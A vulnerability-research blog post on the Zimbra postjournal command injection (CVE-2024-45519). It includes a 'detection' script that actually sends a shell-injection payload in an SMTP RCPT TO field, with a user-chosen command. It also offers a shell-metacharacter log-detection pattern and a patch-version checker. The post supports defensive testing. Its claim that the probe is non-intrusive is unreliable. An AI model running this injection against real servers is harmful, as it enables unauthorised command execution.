Protect Your Zimbra Servers: Detecting CVE-2024-45519

vsociety
5 min read · Oct 9, 2024


CVE-2024-45519

9.8 Critical Severity

Detection script (detect.py):

```python
import socket
import sys
import time


def check_vulnerability(target_ip, target_port, payload):
    """Open an SMTP session to the postjournal port and send the test RCPT TO."""
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(10)
            s.connect((target_ip, target_port))
            print(f"[*] Connected to {target_ip}:{target_port}")
            # Consume the 220 greeting so the first reply we inspect is the EHLO response
            s.recv(1024)
            # Standard SMTP envelope; the RCPT TO local part carries the test payload
            smtp_commands = [
                b'EHLO localhost\r\n',
                b'MAIL FROM:<test@mail.com>\r\n',
                f'RCPT TO:<"{payload}"@mail.com>\r\n'.encode(),
                b'DATA\r\nTest Message\r\n.\r\n'
            ]
            for command in smtp_commands:
                s.sendall(command)
                response = s.recv(1024)
                if not response:
                    print(f"[-] No response received for command: {command.decode().strip()}")
                    return
                # A 250 reply means the server accepted the command as sent
                if b'250' in response:
                    print(f"[+] Command executed: {command.decode().strip()} - Response: {response.decode().strip()}")
                else:
                    print(f"[-] Command failed: {command.decode().strip()} - Response: {response.decode().strip()}")
                time.sleep(1)
            print("[*] Vulnerability detection completed.")
    except socket.timeout:
        print(f"[-] Connection to {target_ip}:{target_port} timed out.")
    except socket.gaierror:
        print(f"[-] Invalid target IP address or hostname: {target_ip}")
    except socket.error as err:
        print(f"[-] Network error occurred: {err}")
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}")


def interactive_setup():
    """Prompt for target, port and payload, then run the check."""
    try:
        target_ip = input("Enter the target IP address: ").strip()
        target_port = input("Enter the target port (default is 10027): ").strip()
        target_port = int(target_port) if target_port else 10027
        payload = input('Enter the payload (default is "aabbb$(touch /tmp/pwned)"): ').strip()
        if not payload:
            payload = 'aabbb$(touch /tmp/pwned)'
        print(f"[*] Checking {target_ip}:{target_port} for vulnerability with payload '{payload}'")
        check_vulnerability(target_ip, target_port, payload)
    except ValueError:
        print("Invalid input. Please ensure the port is a number.")
    except KeyboardInterrupt:
        print("\nProcess interrupted by user.")


if __name__ == "__main__":
    interactive_setup()
```

Description

Introduction

A newly disclosed vulnerability in Synacor's Zimbra Collaboration platform is under active, aggressive exploitation, according to security researchers. Enterprise security company Proofpoint first observed the attacks on September 28, 2024. They abuse CVE-2024-45519, a critical flaw in Zimbra's postjournal service that can let unauthenticated attackers execute arbitrary commands on affected installations.
The attackers send spoofed Gmail messages carrying Base64-encoded commands, tricking Zimbra servers into executing them with the 'sh' tool. Although Zimbra fixed the issue in patches released on September 4, 2024 (versions 8.8.15 Patch 46, 9.0.0 Patch 41, 10.0.9, and 10.1.1), many systems remain unpatched.
Synacor has urged users to install the fix immediately to stop exploitation, even though the postjournal feature is not enabled in most deployments. Where the fix cannot be deployed right away, temporarily removing the postjournal binary may reduce the risk.

How it works

The Python script identifies CVE-2024-45519 by exchanging SMTP commands with the Zimbra postjournal service. The procedure, step by step:

  • Establishing a connection: the script opens a TCP connection to the target server using the IP address and port you provide. Zimbra's postjournal service normally listens on port 10027, but this can be changed if needed.
  • Sending crafted SMTP commands:
    Once connected, the script sends the usual SMTP sequence ('EHLO', 'MAIL FROM', 'RCPT TO' and 'DATA'). The catch is that the RCPT TO command carries a payload meant to make the server run a shell command. The script's default payload is "aabbb$(touch /tmp/pwned)", which is sent as RCPT TO:<"aabbb$(touch /tmp/pwned)"@mail.com>.
    If the vulnerability is present, this payload attempts to create the file '/tmp/pwned' on the server.
  • Examining the response: the server answers every SMTP command with a status code (such as "250 OK" for an accepted command). If the crafted RCPT TO command with the payload is accepted without complaint, the server may be susceptible to command injection; a server that sanitizes its input properly should reject it.
  • Assessing vulnerability: the script concludes that the system may be susceptible to CVE-2024-45519 if the server returns a '250' reply, meaning it accepted the malicious payload. If the payload is refused or no response arrives, the server is probably not susceptible or has already been patched.

Here’s Why It Works:

Zimbra's postjournal service does not adequately sanitize user input, so attackers can inject arbitrary commands through SMTP requests. By exploiting this, an attacker can execute commands in the context of the Zimbra user and take control of the compromised server. The script detects the vulnerability by non-intrusively mimicking this exploitation attempt.

If the injection succeeds, the server executes the injected command (creating the '/tmp/pwned' file with the default payload), and the positive response is what confirms the vulnerability.
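Because the weakness is a missing sanitization step on the recipient's local part, that same property gives defenders a detection hook: a recipient address carrying shell syntax has no legitimate reason to reach a mail transport. The following is an added example (not part of the original post, and not Zimbra's code) that classifies recipient addresses and flags them in Postfix-style delivery log lines. The log layout and the sample lines are constructed assumptions, so adapt the `RECIPIENT_FIELD` expression to what your own mail log actually shows.

```python
import re

# Characters that let a quoted SMTP local part reach a shell as a command:
# command substitution, command separators, pipes, backgrounding, redirects.
SHELL_METACHARS = re.compile(r'\$\(|`|[;|&<>\n]|\$\{')

# Conservative alphabet for a mailbox local part (assumption: deliberately
# stricter than RFC 5321, so anything outside it is worth a second look).
SAFE_LOCAL_PART = re.compile(r'^[A-Za-z0-9._%+-]{1,64}$')

# Postfix-style "to=<...>" field. Zimbra feeds postjournal from Postfix, but
# this exact log layout is a constructed assumption, not captured from a host.
RECIPIENT_FIELD = re.compile(r'to=<(?P<addr>[^>]*)>')

# Constructed sample log lines; the second carries the payload from the write-up.
SAMPLE_LOG = [
    'Oct  9 10:01:12 mail postfix/smtp[2211]: 4X1: to=<alice@example.org>, '
    'relay=127.0.0.1[127.0.0.1]:10027, status=sent (250 OK)',
    'Oct  9 10:01:15 mail postfix/smtp[2211]: 4X2: to=<"aabbb$(touch /tmp/pwned)"@mail.com>, '
    'relay=127.0.0.1[127.0.0.1]:10027, status=sent (250 OK)',
    'Oct  9 10:01:20 mail postfix/smtp[2211]: 4X3: to=<"first last"@example.org>, '
    'relay=127.0.0.1[127.0.0.1]:10027, status=sent (250 OK)',
]


def split_address(addr):
    """Return (local_part, domain); a quoted local part is returned without its quotes."""
    local, sep, domain = addr.rpartition('@')
    if not sep:
        return addr, ''
    if len(local) >= 2 and local[0] == '"' and local[-1] == '"':
        local = local[1:-1]
    return local, domain


def classify_recipient(addr):
    """'injection' if the local part contains shell syntax, 'odd' if it merely
    falls outside the safe alphabet, 'ok' otherwise."""
    local, _domain = split_address(addr)
    if SHELL_METACHARS.search(local):
        return 'injection'
    if not SAFE_LOCAL_PART.match(local):
        return 'odd'
    return 'ok'


def scan_log(lines):
    """Return a list of (line_no, verdict, address) for every recipient that is not 'ok'."""
    hits = []
    for n, line in enumerate(lines, 1):
        for m in RECIPIENT_FIELD.finditer(line):
            verdict = classify_recipient(m.group('addr'))
            if verdict != 'ok':
                hits.append((n, verdict, m.group('addr')))
    return hits


if __name__ == "__main__":
    for line_no, verdict, addr in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {verdict:9} {addr}")
```

The 'injection' verdict is the alert; 'odd' is a lower-severity bucket for quoted local parts with spaces or other unusual characters, which are rare in practice and worth reviewing but are not by themselves evidence of this CVE.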

How to use

1. Make sure Python 3 is installed.

2. Copy the script and save it as ‘detect.py’.

3. Start the program: open a terminal or command prompt, change to the directory where the script is saved, and run: python3 detect.py

4. Enter the target information: the script first asks for the IP address of the Zimbra server to test, then for the target port (press Enter to use the default 10027), and finally for the payload to test. The default payload is "aabbb$(touch /tmp/pwned)", which tries to create the file '/tmp/pwned' if the injection succeeds.

5. Interpret the findings. The script will output:

  • If the target system is vulnerable, the script will respond with:

[+] Command executed: RCPT TO:<"aabbb$(touch /tmp/pwned)"@mail.com> - Response: 250 OK

  • This means the server accepted the malicious input, suggesting that it might be vulnerable.
  • If the vulnerability is mitigated or the target is not vulnerable, you’ll see a response indicating the command failed or was rejected.

Example Usage:

$ python3 detect.py
Enter the target IP address: 192.168.1.01
Enter the target port (default is 10027):
Enter the payload (default is "aabbb$(touch /tmp/pwned)"):
[*] Checking 192.168.1.10:10027 for vulnerability with payload 'aabbb$(touch /tmp/pwned)'
[*] Connected to 192.168.1.01:10027
[+] Command executed: RCPT TO:<"aabbb$(touch /tmp/pwned)"@mail.com> - Response: 250 OK
[*] Vulnerability detection completed.

Final Thoughts:

CVE-2024-45519 is a serious vulnerability in Zimbra's postjournal service that lets attackers execute arbitrary commands on unpatched systems. Given the reported active exploitation, it is critical to apply the patches, disable unused services (such as postjournal), and restrict access to the service to trusted networks.
Administrators can test their systems for this vulnerability with the accompanying Python script, customizing the payload and analyzing their exposure. The best protection against this vulnerability, however, is preventive: deploy updates promptly and check for vulnerabilities regularly.
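Since the fix is a version bump, checking the installed release against the fixed versions named above is the simplest first triage step, and it needs no network probe. This added example (not part of the original post) encodes that list. The input is assumed to be a version string like the one `zmcontrol -v` prints, reduced to a form such as "8.8.15_P46", "9.0.0 Patch 41" or "10.0.9"; the parsing of that layout is an assumption, and versions outside the listed lines are reported as unknown rather than guessed.

```python
import re

# Fixed releases listed in the September 4, 2024 Zimbra patches (from the write-up).
# The 8.8.15 and 9.0.0 lines are patch-numbered; the 10.x lines use the third component.
FIXED_PATCH_LINES = {(8, 8, 15): 46, (9, 0, 0): 41}
FIXED_MINOR_LINES = {(10, 0): 9, (10, 1): 1}

# Assumed version layout: "major.minor.micro", optionally followed later in the
# string by "_P<n>" or "Patch <n>" (e.g. "8.8.15_P46", "9.0.0 Patch 41", "10.0.9").
# The (?!\.) lookahead keeps "Patch 8.8.15_P46" from being read as patch 8.
VERSION_RE = re.compile(r'(\d+)\.(\d+)\.(\d+)(?:.*?(?:[Pp]atch\s*|_[Pp])(\d+)(?!\.))?')


def parse_version(text):
    """Return (major, minor, micro, patch); patch is 0 when the string has none."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no Zimbra version found in {text!r}")
    major, minor, micro = (int(x) for x in m.group(1, 2, 3))
    patch = int(m.group(4)) if m.group(4) else 0
    return major, minor, micro, patch


def patch_status(text):
    """'patched', 'vulnerable' or 'unknown' relative to the CVE-2024-45519 fixes."""
    major, minor, micro, patch = parse_version(text)
    line = (major, minor, micro)
    if line in FIXED_PATCH_LINES:
        return 'patched' if patch >= FIXED_PATCH_LINES[line] else 'vulnerable'
    if (major, minor) in FIXED_MINOR_LINES:
        return 'patched' if micro >= FIXED_MINOR_LINES[(major, minor)] else 'vulnerable'
    # Lines not named in the advisory (older or newer): do not guess, verify with the vendor.
    return 'unknown'


if __name__ == "__main__":
    # Constructed sample strings, not output captured from a real server.
    for sample in ("8.8.15_P45", "8.8.15_P46", "9.0.0 Patch 41", "10.0.8", "10.1.1", "8.7.11"):
        print(f"{sample:16} -> {patch_status(sample)}")
```

A 'patched' result only says the code fix is present; it does not replace the other two recommendations above (disabling postjournal where unused and limiting network access to it), since those reduce exposure to any future issue in the same service.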

Reference

https://thehackernews.com/2024/10/researchers-sound-alarm-on-active.html
https://blog.projectdiscovery.io/zimbra-remote-code-execution/
https://www.helpnetsecurity.com/2024/10/02/cve-2024-45519-exploited/


Written by vsociety

vsociety is a community centered around vulnerability research
